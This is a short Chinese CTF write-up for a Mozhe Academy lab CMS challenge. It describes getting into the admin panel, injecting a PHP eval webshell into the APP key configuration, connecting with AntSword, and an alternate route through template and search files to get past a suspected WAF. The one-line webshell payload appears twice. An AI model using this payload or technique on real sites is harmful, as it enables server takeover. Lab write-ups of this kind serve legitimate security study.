mmzkyl
墨者学院靶场_CMS系统漏洞分析溯源(第2题)
11/04
本文最后更新于2021年11月04日,已超过200天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!
随笔
- 2021-11-04 15:47
好像有点 Bug ,上传的木马似乎不能以单引号进行包含,如下形式的木马便不能正常执行
\\',@@eval($_POST['123']),//
- 2021-11-04 19:38
我觉得应该是存在WAF拦截的 - 2021-11-04 19:39
在自己创建的shell界面使用编码也无法绕过WAF正常连接,而在search界面通过更改编码便能够正常连接,我也没有一个确切答案 - 2021-11-04 19:43
测试了一下,将search代码原封不动的复制到shell中,使用编码也是无法正常连接
目标靶场
解题步骤
- 进入首页
- 查看一下中间件相关信息
- 尝试查看 robots.txt
- 尝试访问 admin.php
- 直接以超级管理员进入后台界面
- 准备进行后台 getshell
- 在 APP key 中插入payload
\\',@@eval($_POST[123]),//
- 先使用hackbar测试一下木马是否有效
- 使用蚁剑尝试连接
- 寻找相应的Key提交即可
新的思路
- 进入模板设置界面
- 随意选择一个目录并进入
- 修改刚才新建的文件,写入木马
- 写入木马并提交
- 回到刚才目录界面,通过可视化获取木马路径
- 测试木马能够使用
- 使用蚁剑尝试连接(更换编码方式也是失败)
- 个人猜测可能是存在WAF拦截,尝试按照网上教程更改search文件
- 写入木马
- 访问搜索界面
- 获取木马路径后尝试使用蚁剑进行连接
- 尝试更改编码绕过WAF(此处存在WAF拦截仅为个人猜测)
- 成功连接